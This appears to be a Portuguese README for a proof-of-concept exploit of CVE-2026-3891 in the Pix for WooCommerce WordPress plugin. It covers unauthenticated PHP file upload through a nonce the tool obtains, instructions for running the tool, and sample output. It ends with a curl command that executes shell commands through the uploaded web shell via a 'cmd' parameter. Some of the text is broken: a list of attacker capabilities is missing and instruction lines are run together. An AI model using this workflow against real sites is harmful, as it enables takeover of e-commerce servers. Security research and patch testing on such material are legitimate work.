
PoC para CVE-2026-3891 — Upload Arbitrário de Arquivo Não Autenticado levando a Execução Remota de Código no Pix for WooCommerce <= 1.5.0
CVE-2026-3891 é uma vulnerabilidade crítica de Upload Arbitrário de Arquivos não Autenticado encontrada no plugin Pix for WooCommerce para WordPress nas versões até e incluindo 1.5.0.
A vulnerabilidade existe na funcionalidade lkn_pix_for_woocommerce_c6_save_settings devido à falta de controles de autorização e validação insuficiente do tipo de arquivo. O exploit automatiza o processo de obtenção de um nonce válido e demonstra o upload irrestrito de um arquivo PHP para um diretório acessível pela web.
Ao explorar essa vulnerabilidade, um atacante não autenticado pode ser capaz de:
pip install requests
CVE-2026-3891.py em seu sistema.python CVE-2026-3891.py
Digite a URL do WordPress alvo quando solicitado:
[?] Digite a URL alvo: http://localhost/wordpress
Exemplo:
[*] Solicitando nonce...
[+] Nonce obtido: **********
[*] Enviando woocommerce.php...
[+] Arquivo enviado com sucesso!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
